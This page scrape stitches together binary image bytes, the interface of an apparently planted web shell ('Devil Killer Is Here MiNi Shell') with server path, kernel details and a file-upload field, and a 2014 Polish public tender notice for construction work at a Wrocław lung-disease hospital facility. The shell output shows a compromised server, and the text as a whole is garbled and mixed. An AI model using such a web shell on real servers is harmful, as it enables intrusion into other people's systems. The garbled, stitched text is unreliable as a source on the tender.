JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20141031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20141031/229805-N-2014.html

<p class="kh_header"><b>Wrocław: Przedmiotem zamówienia jest  dokończenie  robót budowlanych dotyczących zadania inwestycyjnego tj. przebudowy obiektu Leśne na potrzeby ośrodka ftyzjatrycznego w Placówce Zamiejscowej DCChP w Obornikach Śląskich.</b><br>
<b>Numer ogłoszenia: 229805 - 2014; data zamieszczenia: 31.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Chorób Płuc we Wrocławiu , ul. Grabiszyńska 105, 53-439 Wrocław, woj. dolnośląskie, tel. 071 3349520, 410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dcchp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: podmiot leczniczy niebędący przedsiębiorcą.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest  dokończenie  robót budowlanych dotyczących zadania inwestycyjnego tj. przebudowy obiektu Leśne na potrzeby ośrodka ftyzjatrycznego w Placówce Zamiejscowej DCChP w Obornikach Śląskich..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1 Przedmiotem zamówienia jest  dokończenie  robót budowlanych dotyczących zadania inwestycyjnego tj. przebudowy obiektu Leśne na potrzeby ośrodka ftyzjatrycznego w Placówce Zamiejscowej DCChP w Obornikach Śląskich.
1.2 Zamówienie będzie realizowane w ramach Projektu pn. Modernizacja i rozbudowa wraz z doposażeniem obiektu Leśne na potrzeby ośrodka ftyzjatrycznego Dolnośląskiego Centrum Chorób Płuc we Wrocławiu   w Placówce Zamiejscowej  w Obornikach Śląskich.
Zamówienie dofinansowane w ramach naboru numer 15-S-8.1-2010 prowadzonego w trybie systemowym dla Priorytetu VIII Modernizacja infrastruktury ochrony zdrowia na Dolnym Śląsku (Zdrowie), Działanie 8.1 Poprawa jakości opieki zdrowotnej Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.20.00.00-9, 45.21.00.00-2, 45.21.50.00-7, 45.22.00.00-5, 45.26.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.32.00.00-6, 45.33.00.00-9, 45.40.00.00-1, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6, 42.40.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w   kwocie 15 000,00 zł:
2. Wadium należy wnieść (z adnotacją WADIUM  SPRAWA BZP.3810.64.2014.TP) przed upływem terminu składania ofert. Wadium może być wniesione tylko w formie określonej art.45 ust. 6 ustawy 
z dn. 29.01.2004r. Prawo zamówień publicznych (DZ. U. z 2013 r. poz. 984, 1047 I 1473 oraz z 2014 r. poz. 423, 768, 811, 915, 1146 I 1232) tj.:-pieniądzu. Wpłat prosimy dokonywać wyłącznie przelewem na konto depozytowe Zamawiającego:  Bank Nordea Bank Polska S.A.  nr. 07 1440 1101 0000 0000 1219 4258 w terminie umożliwiającym Zamawiającemu w dniu otwarcia ofert stwierdzenia faktu jego wniesienia. Na dowodzie wpłaty wadium należy wpisać nr konta Wykonawcy, na które Zamawiający ma dokonać zwrotu wadium oraz nr niniejszego postępowania. Wadium zostaje zwrócone na zasadach określonych art.46 ustawy.

3. Wadium wniesione w pozostałych formach tj:
- poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo Kredytowej, z tym że poręczenie Kasy jest zawsze poręczeniem pieniężnym.
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 
z późniejszymi zmianami).
3a. W przypadku wnoszenia wadium w formie gwarancji, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na każde pisemne żądanie Zamawiającego, sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a.	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,
b.	określenie wierzytelności, która ma być zabezpieczona gwarancją,  
c.	kwotę gwarancji,
d.	termin ważności gwarancji,
e.	Z treści gwarancji powinno wynikać bezwarunkowe na każde pisemne żądanie zgłoszenie przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu kwoty wadium w okolicznościach określonych przepisami Art. 46 ust. 4a i 5 ustawy.
4.	Wadium wnoszone w innych formach niż pieniądzu należy złożyć w formie oryginału w siedzibie Zamawiającego ul. Grabiszyńska 105 , budynek B
 wysoki parter pok. 12- KASA (godz. otwarcia  11.00-13.00, od Pn.- Pt.) najpóźniej do dnia składania ofert. Prosimy nie załączać oryginału  dokumentu stanowiącego wadium przetargowe do oferty. W związku powyższym prosimy o załączenie do oferty kserokopii potwierdzonej za zgodność z oryginałem dokumentu stanowiącego wadium przetargowe.
UWAGA. Istnieje możliwość zaliczenia wniesionego w pieniądzu wadium na poczet zabezpieczenia zgodnie z art.148 ust4 ustawy z dn. 29.01.2004r. Prawo zamówień publicznych (DZ. U. z 2013 r. poz. 984, 1047 I 1473 oraz z 2014 r. poz. 423, 768, 811, 915, 1146 I 1232)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów na potwierdzenie tego warunku, obowiązuje jedynie oświadczenie zawarte we wzorze oferty - zał. nr 1 do SIWZ o posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz  z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże w powyższym zakresie:

Wykonanie przynajmniej jednej roboty budowlanej (zawierającej min. elementy wymiany stolarki, elewacji, wykończenia wnętrz, instalacji) wykonanej na obiekcie wpisanym do rejestru, wykazu zabytków, lub który znajdował się na terenie strefy ochrony konserwatorskiej, ustanowionej na podstawie art. 19 ust. 3 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U. nr 162, poz. 1568 z późn. zm.), a wartość robót wynosiła min.  500 000 zł. brutto.
Ocena spełnienia ww warunków w oparciu o złożone dokumenty i formułę spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający wymaga wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.

Zamawiający uzna warunek za spełniony, jeśli Wykonawca wypełni załącznik nr 4 do SIWZ 
i wykaże, że dysponuje osobami które będą uczestniczyć w wykonywaniu zamówienia przynajmniej w zakresie:
1)	kierownika budowy, posiadającego uprawnienia do wykonywania samodzielnych funkcji 
w budownictwie w specjalności konstrukcyjno-budowlanej bez ograniczeń, przy czym uprawnienia budowlane muszą być ważne i  wydane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn. Dz.U.2010.243.1623 ze zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jedn. Dz.U.2006.83.578 ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniające do kierowania robotami konstrukcyjno-budowlanymi objętymi przedmiotowym zamówieniem. Wymagany jest także wpis na listę członków właściwej Izby samorządu zawodowego, co potwierdza zaświadczenie wydane przez tę Izbę. Osoba, która będzie uczestniczyć w wykonaniu zamówienia  musi posiadać co najmniej 5 letni staż pracy na stanowisku kierownika budowy w tym dwa lata doświadczenia w pracy na obiektach zabytkowych (na obiekcie) wpisanym do rejestru, wykazu zabytków, lub który znajdował się na terenie strefy ochrony konserwatorskiej, ustanowionej na podstawie art. 19 ust. 3 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U. nr 162, poz. 1568 z późn. zm.),
2)	kierownika robót elektrycznych posiadającego uprawnienia budowlane bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych  wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo budowlane (j/w) lub ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów, upoważniające do kierowania robotami elektrycznymi objętymi przedmiotowym zamówieniem oraz minimum 3 letni staż pracy na stanowisku kierownika budowy lub robót elektrycznych; oraz wpis na listę członków właściwej Izby samorządu zawodowego, co potwierdza zaświadczenie wydane przez tę Izbę. 
3)	kierownika robót instalacyjnych posiadającego uprawnienia budowlane bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo budowlane (j/w) lub ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów, upoważniające do kierowania robotami instalacyjnymi objętymi przedmiotowym zamówieniem oraz minimum 3 letni staż pracy na stanowisku kierownika budowy lub robót instalacyjnych; oraz wpis na listę członków właściwej Izby samorządu zawodowego, co potwierdza zaświadczenie wydane przez tę izbę.                      

Wykonawca może dysponować osobami wykazanymi w wykazie osób zarówno na podstawie umowy o pracę, jak i na innej podstawie np. umowie zlecenia, umowie o dzieło, czy umowie przedwstępnej. 

Wskazane osoby powinny biegle posługiwać się językiem polskim. W przypadku, gdy wskazane osoby nie wykazują się biegłą znajomością języka polskiego Wykonawca jest zobowiązany zapewnić co najmniej jednego tłumacza na okres realizacji umowy, w celu realizacji potrzeb wynikających z wykonywanego zamówienia. 

Doświadczenie w/w osób należy liczyć przed dniem wszczęcia niniejszego postępowania.
UWAGA! Jeżeli Wykonawca wskaże okres doświadczenia zawodowego bez podania dat dziennych (wyłącznie miesiąc - rok) Zamawiający pominie przy obliczeniu wymaganego okresu skrajnych miesięcy z danego okresu, z uwagi na brak możliwości ustalenia faktycznego okresu doświadczenia w tych miesiącach. Ta sama zasada obowiązywać będzie w przypadku wskazania przez Wykonawcę okresu doświadczenia zawodowego bez dat miesięcznych (wyłącznie rok-rok), wówczas Zamawiający pominie skrajne lata.

Ocena spełnienia w-w warunków w oparciu o złożone dokumenty i formułę spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający wymaga opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.

Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada powyższe dokumenty na kwotę  nie mniejszą niż  500 000 zł
Ocena spełnienia w/w warunków w oparciu o złożone dokumenty i formułę spełnia-nie spełnia.

b)	Zamawiający wymaga informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże że posiada powyższe dokumenty na kwotę  nie mniejszą niż 500 000 zł
Ocena spełnienia ww warunków w oparciu o złożone dokumenty i formułę spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenie wykonawcy o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych  (treść oświadczenia zawiera wzór oferty -  stanowiący załącznik nr 1 do SIWZ).
2.	Oświadczenie Wykonawcy, o braku podstaw do wykluczenia z powodu nie spełnienia warunków, 
o których mowa w art. 24  ustawy Prawo zamówień publicznych,   (treść oświadczenia zawiera wzór oferty -  stanowiący załącznik nr 1 do SIWZ).
